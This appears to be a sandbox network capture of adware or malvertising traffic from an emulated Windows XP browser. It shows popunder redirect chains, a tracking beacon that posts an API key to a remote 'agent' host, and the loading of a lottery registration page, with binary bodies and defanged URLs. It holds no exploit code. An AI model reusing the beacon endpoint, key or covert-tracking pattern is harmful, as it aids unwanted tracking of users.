':0,'ins':0,'cap':0,'spa':0})..

GET /doublepimp/ppuacs/?param=MH RON HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: trk-1.com

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Sat, 15 Oct 2016 06:08:11 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: bnr_clk_f97916a4dd87e2108b9c347b6cc5068a=1; expires=Tue, 15-Nov-2016 07:08:11 GMT; Max-Age=2682000; path=/

Set-Cookie: vst_cnt_8140=1; expires=Tue, 15-Nov-2016 07:08:11 GMT; Max-Age=2682000; path=/

Location: hXXp://cosmicwin.com/vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Sat, 15 Oct 20
16 06:08:11 GMT..Content-Type: text/html..Transfer-Encoding: chunked..
Connection: keep-alive..Set-Cookie: bnr_clk_f97916a4dd87e2108b9c347b6c
c5068a=1; expires=Tue, 15-Nov-2016 07:08:11 GMT; Max-Age=2682000; path
=/..Set-Cookie: vst_cnt_8140=1; expires=Tue, 15-Nov-2016 07:08:11 GMT;
 Max-Age=2682000; path=/..Location: hXXp://cosmicwin.com/vulkanchampio
n/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino..0..

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Cache-Control: max-age=604800

Content-Type: text/plain

Last-Modified: Fri, 16 Sep 2016 17:40:05 GMT

Accept-Ranges: bytes

ETag: "804865c4110d21:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Content-Length: 18

Date: Sat, 15 Oct 2016 06:08:20 GMT

Connection: keep-alive

X-CCC: RU

X-CID: 2
1401D210415C121F84....


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Cache-Control: max-age=604800

Content-Type: application/vnd.ms-cab-compressed

Last-Modified: Fri, 16 Sep 2016 21:16:59 GMT

Accept-Ranges: bytes

ETag: "8017f9a85f10d21:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Content-Length: 51425

Date: Sat, 15 Oct 2016 06:08:20 GMT

Connection: keep-alive

X-CCC: RU

X-CID: 2
MSCF............,...................I.................0I;o .authroot.s
tl....7.8..CK...<Tk.......&{.-{.A......"K.P.,.M.$..E......^..*K...l
..R.l...6......}....y.......}...4.....*.g.7..33d..-....0LdGYqL.\..BL..
,M..*.`..Vg........(....4# . ...... ...ITC......(.x.w.f.F.......iW.0.T
.M._..oC.........e.%. \..F...%L{}>.....d.$..<uC:[.]...*5..<..
.s.F...dRz..N.w..$;<.E.iw..%.B.....\.'p...s.FWN.......<vr.,..).]
[email protected] ...5P(D...(.:....k...5........@a`.......P$.A(y.......`
e`.t._.'..|....D..Td...........f....Y.<,F...'................qs.&D.
..T.V...2].X...i;.U29.....Dh....7..B...0....aA.ix.!.vT.}!.pyC.@V[0..Jm
.$u.. 0..^...."y...y.......k...~$...R$..-..v2B..Z.8..}.kB..n..&.ox#...
....%9.#..........O>.(9i./..{...K..*[.3....y..K#.*.<.-..y4,.....
.X.B.hM.R#...9.l.&b4..^..z....L..d.N.-.......]....N.>.Z.......*....
:.....TK...v"Ik.B.A..blI.h..&.6.I#..b.....)C(D....;..T.7.i~T..Z...'.,q
Q2$..b....\S'.P..}./.{.,X.[.<C..x...i'.;........>p*.)t.c.,...^.0
.jt...-..~..kDX..T......../....-.EF.k,..w0..l..a....,...y~v.O...U.>
..G.H..JZ.......k..Pw.h30..,.$..).S.W..$.%.[zby..^.@X6U/..Y.i..C.. .Py
... B.V..qQ....0./.._G._G8,..cF:.......|.&9'..L.&sGG.N$f....Q.i..!.".P
)T..A. &..0....<[email protected])...v...R.p.:....."y.......,....Wor.
;........W.m..;vnT..c;.pHeF.....X....,. R........Vb....YU.9g.<.X.3.
.jH..%..>0.....O....-....u.|...<..OQ.G......{&..E..-R::....G....
....!.(g.....i...UX"q....7...a{.?.=N.....]D..qD.........0}=..!..a...;.
.O..Ir.x!...................v....&..% Y.l......a).:V...p.S..7.?...
<<< skipped >>>

POST /csdi/wizzcaster/68 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 44

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:09 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=biduaa64rd8pm1dpv31fk0n7s0; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Sat, 15 Oct 2016 0
6:08:09 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=bid
uaa64rd8pm1dpv31fk0n7s0; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..C
ontent-Type: text/html; charset=UTF-8..{"message":"Track was added"}..

GET /apu.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popunder=1&direct=1 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.xmediaserve.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Sat, 15 Oct 2016 06:08:09 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Content-Encoding: gzip

Set-Cookie: DS=WJhTljut6c302|WAHHo|WAHHo; path=/
20b.............S.n.0.}. B..XT.).M%.. .L"LYi..2.KL..9N.-.....t.:.\...s
|.}..`...}..H..^.=..q....UT....U..vt.........T(Mm..tE6.^..VY.....".D..
..)C.rfB.&.J%.r.0....V..,;.....DI.....n...y.y.t.3E.......,..tM..`...:.
.Y.0.7%.......Z....-.Ew_.E.I~..dJ..B.....xG.L.h.e..'.U....X....R..bZ..
][email protected].=$t.....j;C.j.|y3..[.T...,I2".b.k.) S..:.......,..p1S.F{.
.6t.....K..Q.=....I.#.i.....W9m..}.B...=<.w....1D..#...m.ynm..S....
[email protected].|...y.9.L..`:........."e.H.10..)....ved8.0..
.....d...|-.d..r0...v53.H.........P{1......0..HTTP/1.1 200 OK..Server:
 nginx/1.8.0..Date: Sat, 15 Oct 2016 06:08:09 GMT..Content-Type: text/
html..Transfer-Encoding: chunked..Content-Encoding: gzip..Set-Cookie: 
DS=WJhTljut6c302|WAHHo|WAHHo; path=/..20b.............S.n.0.}. B..XT.)
.M%.. .L"LYi..2.KL..9N.-.....t.:.\...s|.}..`...}..H..^.=..q....UT....U
..vt.........T(Mm..tE6.^..VY.....".D....)C.rfB.&.J%.r.0....V..,;.....D
I.....n...y.y.t.3E.......,..tM..`...:..Y.0.7%.......Z....-.Ew_.E.I~..d
J..B.....xG.L.h.e..'.U....X....R..bZ..][email protected].=$t.....j;C.j.|y3..
[.T...,I2".b.k.) S..:.......,..p1S.F{..6t.....K..Q.=....I.#.i.....W9m.
.}.B...=<.w....1D..#[email protected].|...y.
9.L..`:........."e.H.10..)....ved8.0.......d...|-.d..r0...v53.H.......
..P{1......0......


GET /apu2.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popunder=1&direct=1&vdsvdi=Ullu8N6JrU+X5VHawNoIRvVMDzCO66rNcdc4RMED1NgMHRbYt++4YkcxijctWDqk HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.xmediaserve.com

Connection: Keep-Alive

Cookie: DS=WJhTljut6c302|WAHHo|WAHHo; OAID=695046c3b6014e7f28b7cdc4c3702640; _OXLIA[501309]=of2rpm-14335; _OXLCA[501309]=of2rpm-14335

HTTP/1.1 302 Found

Server: nginx/1.8.0

Date: Sat, 15 Oct 2016 06:08:10 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Set-Cookie: _OXLCA[501309]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.xmediaserve.com

Set-Cookie: _OXLCA[501309]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.xmediaserve.com

Set-Cookie: _OXLIA[501309]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.xmediaserve.com

Set-Cookie: _OXLIA[501309]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.xmediaserve.com

Pragma: no-cache

Cache-Control: private, max-age=0, no-cache

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Set-Cookie: OAGEO=UA|07|Kharkiv||49.9808|36.2527|||Pitline Ltd|Pitline Ltd|; path=/; domain=.xmediaserve.com

Set-Cookie: OAID=695046c3b6014e7f28b7cdc4c3702640; expires=Sun, 15-Oct-2017 06:08:10 GMT; Max-Age=31536000; path=/; domain=.xmediaserve.com

Set-Cookie: OXLCA=501309.of2rpm-14335; expires=Sun, 15-Oct-2017 06:08:10 GMT; Max-Age=31536000; path=/; domain=.xmediaserve.com

Set-Cookie: OXLIA=501309.of2rpm-14335; expires=Sun, 15-Oct-2017 06:08:10 GMT; Max-Age=31536000; path=/; domain=.xmediaserve.com

P3P: CP="CUR ADM OUR NOR STA NID"

Set-Cookie: _OXLIA[497271]=of2rpm-14335; expires=Mon, 14-Nov-2016 06:08:10 GMT; Max-Age=2592000; path=/; domain=.xmediaserve.com

Set-Cookie: _OXLCA[497271]=of2rpm-14335; expires=Mon, 14-Nov-2016 06:08:10 GMT; Max-Age=2592000; path=/; domain=.xmediaserve.com

Set-Cookie: OXLCA=501309.of2rpm-14335; expires=Sun, 15-Oct-2017 06:08:10 GMT; Max-Age=31536000; path=/; domain=.xmediaserve.com

Set-Cookie: OXLIA=501309.of2rpm-14335; expires=Sun, 15-Oct-2017 06:08:10 GMT; Max-Age=31536000; path=/; domain=.xmediaserve.com

Location: hXXp://tah.originalcleanbrands.com/?kw=14335&s1=3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5&s2=pc
0..
<<< skipped >>>

GET /css/register/CertifiedWinnerRSP.82125.cssasp?lang=en HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: f.pinid.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache/2.2.31

Expires: Sun, 15 Oct 2017 11:56:59 GMT

Cache-Control: private

Content-Type: text/css

Content-Length: 9506

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:13 GMT

Via: 1.1 varnish

Age: 0

Connection: keep-alive

X-Served-By: cache-lhr6330-LHR

X-Cache: MISS

X-Cache-Hits: 0

X-Timer: S1476511693.800337,VS0,VE79

Vary: Accept-Encoding
@charset "utf-8";./* CSS Document */..@font-face {..font-family: 'OCR 
A Std';. .src:url('hXXp://f.pinid.com///fonts/OCRAStd.otf?#iefix') for
mat('opentype');}..body {..background-color:#fff;..font-family:Arial, 
Helvetica, sans-serif;}..#language1 { ..font-size:13px;..font-weight:b
old;..text-align:center;..margin:auto;..display:table;}...#language2 {
 ..font-size:11px;..font-weight:bold;..text-align:center;..margin:auto
;..display:none;}...languagetext, #language1 a, #language2 a {..color:
#000; .    white-space:nowrap; .    text-decoration:none;}...space1 {.
.height:16px;}..#container {..width:100%;..max-width:850px;..min-width
:320px;..background-image:url(hXXp://f.pinid.com///images/en/default/r
egister/CertifiedWinnerRSP/bgtile_min.png);..background-position:top c
enter;..background-repeat:repeat;..margin:auto;..padding:25px 0;..text
-align:center;}..#whitebox {..width:90%;..margin:auto;..background-col
or:#fff;..padding:10px 0;}..#topcontent {..width:96%;..margin:auto;..p
adding-top:10px;..padding-bottom:14px;}...address {..font-size:11px;..
margin:auto;..text-align:left;..float:left;}...barcode {..font-size:11
px;..margin:auto;..text-align:right;..}..#borderbox {..width:96%;..mar
gin:auto;..border:1px solid #000;..padding:10px 0;}...#titlecontent {.
.width:100%;..margin:auto;.    /* .    * prototype skin CertifiedWinne
r uses variable font-size.    * font-size: 34px;.    */..text-align:ce
nter;}...topnumber {..font-family:"OCR A Std", "Courier New", Courier,
 monospace;..font-size:12px;..vertical-align:middle;}...maintitle 
<<< skipped >>>

GET ///fonts/OCRAStd.otf? HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: f.pinid.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache/2.2.31

Last-Modified: Tue, 19 Nov 2013 17:27:45 GMT

ETag: "1ecc-71c4-4eb8afb8a4640"

Access-Control-Allow-Origin: *

Content-Type: application/x-font-otf

Content-Length: 29124

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:14 GMT

Via: 1.1 varnish

Age: 3344

Connection: keep-alive

X-Served-By: cache-lhr6330-LHR

X-Cache: HIT

X-Cache-Hits: 66

X-Timer: S1476511694.126127,VS0,VE0
OTTO.......PBASE. ....\$...:CFF /..:......L.DSIG.i0...\`...dGPOS.z....
[....RGSUB.U....Y.....OS/2X.sZ...@...`cmap..dF........head..[........6
hhea...$.......$hmtxFSDq..V.....maxp..P....8....namek[OO.......`post..
.e....... .......7mI.._.<......................0.....7.............
......".....0.0......................P..................X...K...X...^.
d.C............................ADBE.@. ....."...7.. .............. ...
..............=.............=...........F...........M...........=.....
....:._.....................1.......................$...........z.....
..............................$.......................t...............
........4.N.........b...........2...........H... 1988, 2002 Adobe Syst
ems Incorporated. All rights reserved.OCR A StdRegular2.036;ADBE;OCRAS
tdVersion 2.036;PS 2.000;hotconv 1.0.57;makeotf.lib2.0.21895OCRAStdAme
rican Type Founders staff and Adobe Type staffhXXp://VVV.adobe.com/typ
ehXXp://VVV.adobe.com/type/legal.html... .1.9.8.8.,. .2.0.0.2. .A.d.o.
b.e. .S.y.s.t.e.m.s. .I.n.c.o.r.p.o.r.a.t.e.d... .A.l.l. .r.i.g.h.t.s.
 .r.e.s.e.r.v.e.d...O.C.R. .A. .S.t.d.R.e.g.u.l.a.r.2...0.3.6.;.A.D.B.
E.;.O.C.R.A.S.t.d.O.C.R.A.S.t.d.V.e.r.s.i.o.n. .2...0.3.6.;.P.S. .2...
0.0.0.;.h.o.t.c.o.n.v. .1...0...5.7.;.m.a.k.e.o.t.f...l.i.b.2...0...2.
1.8.9.5.A.d.o.b.e. .S.y.s.t.e.m.s. .I.n.c.o.r.p.o.r.a.t.e.d.A.m.e.r.i.
c.a.n. .T.y.p.e. .F.o.u.n.d.e.r.s. .s.t.a.f.f. .a.n.d. .A.d.o.b.e. .T.
y.p.e. .s.t.a.f.f.h.t.t.p.:././.w.w.w...a.d.o.b.e...c.o.m./.t.y.p.e.h.
t.t.p.:././.w.w.w...a.d.o.b.e...c.o.m./.t.y.p.e./.l.e.g.a.l...h.t.
<<< skipped >>>

GET ///images/en/default/register/CertifiedWinnerRSP/stamps_min.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: f.pinid.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache/2.2.31

Last-Modified: Tue, 08 Jul 2014 21:33:12 GMT

Cache-Control: public, max-age=315360000, s-maxage=315360000

Content-Type: image/png

Content-Length: 9512

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:14 GMT

Via: 1.1 varnish

Age: 17293878

Connection: keep-alive

X-Served-By: cache-lhr6330-LHR

X-Cache: HIT

X-Cache-Hits: 269

X-Timer: S1476511694.260120,VS0,VE0
.PNG........IHDR.......L.....t..t..$.IDATx..].xUU.=.....P.!$.. $.....1
t..M.t..R..&""EDD.AE..AEF...u..c..g....0....s....}..Y[..{oN....}.G....
...Z.......p....a...G,@,T..X#.6b....z..........'.^,Y..X.X-1...{8.....@
.....`...%.Dl..F..b..........&..W....f...9..`ab.b.bc.v..#6Al..n.hYbc.@
.a'..b]...<f..|[email protected] ...$6..  ..m..R........
R. -..N..-.&V.......,"....V...;.X.cN.>.p....f..}....^...e...#....ED
D|5g......Z=..b.........p...v....W..%)b.Ln..6d.x.ei.....d;J...&>..X
2..s.X...c..p.-[.L.....*rl..-....w%''.z..u.......{...>....*,,t.....
[email protected].|......I...q..bM...b#..x............ ^.v-e*.lW.Q
[email protected]....`..]..[.`.Z8.7.|.l...^{.....w111..^.zqtt.g.7o...=.....|\.._
..k....;.....r)7!.'S2..2...;.........s.Y.7.q.e.>.yd<.s#Aip[.A..%
k8%h{....!.}/....0.../.....<..;~.x../((8h7.*--]5|.p.b..S......=.7..
..{..\k..]....".<..ub..~.I....bRe(.-E....F6.%..X...b.`B.`....Q..NV|
.2. .nb...8..w...j.D|t......s..Q.A...W.ZUz..$  .O`.%....7d..iw..0...w.
..3\.X..$......*.t....`=.~..Q.....8.,K.,#....3........a....M..$....S..
....L..Ep=..n.cK.\...*.,..Q'...qO.....}..9....5k..G.........)v.).7=..C
...?..7.l...p.??...p.O?.4f...;....*../^..K/e..@...}..L..dL...].).r_.=.
\[email protected]*...L~<I.C..-A.8c......K..*W......... ......
.......n&.u.~J^.&.R.RH.....x..y.......M.0a;..K.......JLLtu......;.....
v..5.....W..........v.8x...]........_...w...;.....b@HG....;w...}..;w]x
x.W..j`......,.........\.......).q..s.......T....J..J.z.;...dr.....8..
.;...R..y..u.s{..-.......{.x..GCm..cD.T..}..M.6.....3f'..].v......
<<< skipped >>>

GET ///images/en/default/register/CertifiedWinnerRSP/senderscore_min.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: f.pinid.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache/2.2.31

Last-Modified: Tue, 08 Jul 2014 21:33:12 GMT

Cache-Control: public, max-age=315360000, s-maxage=315360000

Content-Type: image/png

Content-Length: 5639

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:14 GMT

Via: 1.1 varnish

Age: 17293275

Connection: keep-alive

X-Served-By: cache-lhr6330-LHR

X-Cache: HIT

X-Cache-Hits: 394

X-Timer: S1476511694.334192,VS0,VE0
.PNG........IHDR...>...>.....s..D....IDATh..[.xSe....".*......Dv
e..M.AA~PG._..G..eUA@[email protected]@.QT.Y....&m.tM.}.M.oi.6.....I..).,..}..Irs
.w....|..)..BG#9%U..O.. .^P....6XP...re...5...`...P!6.A......xA*S.Z.~.
T.z.O".../;........T..:.._.........l.D.xR..._.P.1.8.S.......ZB.PC.....
jt..GpH.. ...<!1)Y....BW.......F!0(x.B.....B.@s..\..{.. J.J.U.....P
$....A..zxO\.2.....[........pT....e..|~O....G.w.)T...B/...CQ..w..'..~.
p..>..E.(..e..y$.0..bHhX..Z{......B.;Z(.'.....U.......h......<.{
xd4.B.@......{......j\....<P ........G..E..h.(..( ;.J......ZZ[....k
.k...!;'.".b..G$.....jp.@.}..t9...T..a.._:B...,W.[.-.@... ''.jk..#..CK
..m.[[email protected]^..ddp.*;........bhiq
.jSZ6....e.>([.:..|..}.o.c...iOC..k.r..Ps.?.hL.d..<.%.......^...
../C.I.)..xJj.....:.}..*..?x..z...?6..V..q....g2C...7...z.'(].......[.
....Os...|.C`.cb..m..{..S/................1)..........a. .v.m.2......L
!5-.........E...W....wCa..P.o........,.N...`y..(.>...f0..'A...:7..?
.La..z..s./m...8.s...!.>.|[email protected]..$..4&..h..N&$&.!z.FK..8Q.D.
..F.I .CQ..P....5....y!...`=tR..}4s..`/K..H.....g...AKQ....r......u...
..J.j."d.\.2.s..W.D)4....$......*k.R($.. .....dN..Y...v.._W.nG.)H.QP4a
1..Z7.. .l.=.g...Ih.:..]........V.r.r.............#`........D.1....u./
/.`...y....m.......gdrR....50...B..wL..;..-d.T..i.w......C4,....c.4l^t
^.-a.B...Y..b.......,..m...ui.!q.a(@....gKNV.a...h.}..g\.l..>....{.
.9...7.Id...<MF.)9.]...xx."(....q. ..m.a.e....j......u..[.e...U8...
.....`..{..s...|..E|[email protected]"2F.....)...x...v
<<< skipped >>>

GET ///images/en/default/register/CertifiedWinnerRSP/dottedlinetalltile_min.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: f.pinid.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache/2.2.31

Last-Modified: Tue, 08 Jul 2014 21:33:12 GMT

Cache-Control: public, max-age=315360000, s-maxage=315360000

Content-Type: image/png

Content-Length: 80

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:14 GMT

Via: 1.1 varnish

Age: 16644665

Connection: keep-alive

X-Served-By: cache-lhr6330-LHR

X-Cache: HIT

X-Cache-Hits: 84

X-Timer: S1476511694.782983,VS0,VE0
.PNG........IHDR.............8..A....IDAT..c.....BY^..8q.....E....:...
..IEND.B`.HTTP/1.1 200 OK..Server: Apache/2.2.31..Last-Modified: Tue, 
08 Jul 2014 21:33:12 GMT..Cache-Control: public, max-age=315360000, s-
maxage=315360000..Content-Type: image/png..Content-Length: 80..Accept-
Ranges: bytes..Date: Sat, 15 Oct 2016 06:08:14 GMT..Via: 1.1 varnish..
Age: 16644665..Connection: keep-alive..X-Served-By: cache-lhr6330-LHR.
.X-Cache: HIT..X-Cache-Hits: 84..X-Timer: S1476511694.782983,VS0,VE0..
.PNG........IHDR.............8..A....IDAT..c.....BY^..8q.....E....:...
..IEND.B`.....


GET /xmljs/FL.82125.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: f.pinid.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache/2.2.31

Expires: Sun, 15 Oct 2017 11:57:02 GMT

Cache-Control: private

Content-Type: text/javascript

Content-Length: 27835

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:16 GMT

Via: 1.1 varnish

Age: 0

Connection: keep-alive

X-Served-By: cache-lhr6330-LHR

X-Cache: MISS

X-Cache-Hits: 0

X-Timer: S1476511696.431600,VS0,VE104

Vary: Accept-Encoding
"use strict";./** @namespace The namespace for all FreeLotto JavaScrip
t functions */.var FL = FL || {};..(function ($) {..    // Add :focus 
selector for jQuery.    // If we ever upgrade to 1.6 , it is built in.
    $.expr[':'].focus = function( elem ) {.        return elem === doc
ument.activeElement && ( elem.type || elem.href );.    };..    /** @na
mespace Language-related functions (map, forEach, etc) */.    FL.lang 
= {};.    .    /* hXXp://dean.edwards.name/base/forEach.js.     forEac
h, version 1.0.     Copyright 2006, Dean Edwards.     License: hXXp://
VVV.opensource.org/licenses/mit-license.php.     */.    // array-like 
enumeration.    if (!Array.forEach) { // mozilla already supports this
.        Array.forEach = function (array, block, context) .        {. 
           for (var i = 0; i < array.length; i  ) {.               
 block.call(context, array[i], i, array);.            }.        };.   
 }..    // generic enumeration.    Function.prototype.forEach = functi
on (object, block, context) .    {.        for (var key in object) {. 
           if (typeof this.prototype[key] === "undefined") {.         
       block.call(context, object[key], key, object);.            }.  
      }.    };..    // globally resolve forEach enumeration.    /**.  
   * Iterate through a list, performing block on each iteration.     *
 @param {Object, Array} object List over which to iterate .     * @par
am {Function} block Function to execute on each iteration .     * @par
am {Object} [context] Scope to use when calling block..     * @def
<<< skipped >>>

GET /xmljs/reg_skins.82125.js?lang=en HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: f.pinid.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache/2.2.31

Expires: Sat, 15 Oct 2016 06:21:00 GMT

Cache-Control: public, must-revalidate

Content-Type: text/javascript

Content-Length: 12713

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:16 GMT

Via: 1.1 varnish

Age: 2836

Connection: keep-alive

X-Served-By: cache-lhr6330-LHR

X-Cache: HIT

X-Cache-Hits: 1

X-Timer: S1476511696.737030,VS0,VE0

Vary: Accept-Encoding
.$("document").ready(function () {.    bool_reg = /register.asp/.test(
document.location.href); // call recordTime on register.asp page only.
    if (bool_reg) {.        var load_time = new Date(); // get the tim
e when we load form.        recordTime(load_time);.    }.});..function
 recordTime(load_time) {.    var focus_time;.   .    $('[name=firstnam
e],[name=lastname],[name=address],[name=address2],[name=city],[name=zi
pcode],[name=email],[name=email2],[name=otherregion]').focus( function
(){focus_time = new Date();} ); // get current time onFocus for partic
ular input field.    $('[name=firstname],[name=lastname],[name=address
],[name=address2],[name=city],[name=zipcode],[name=email],[name=email2
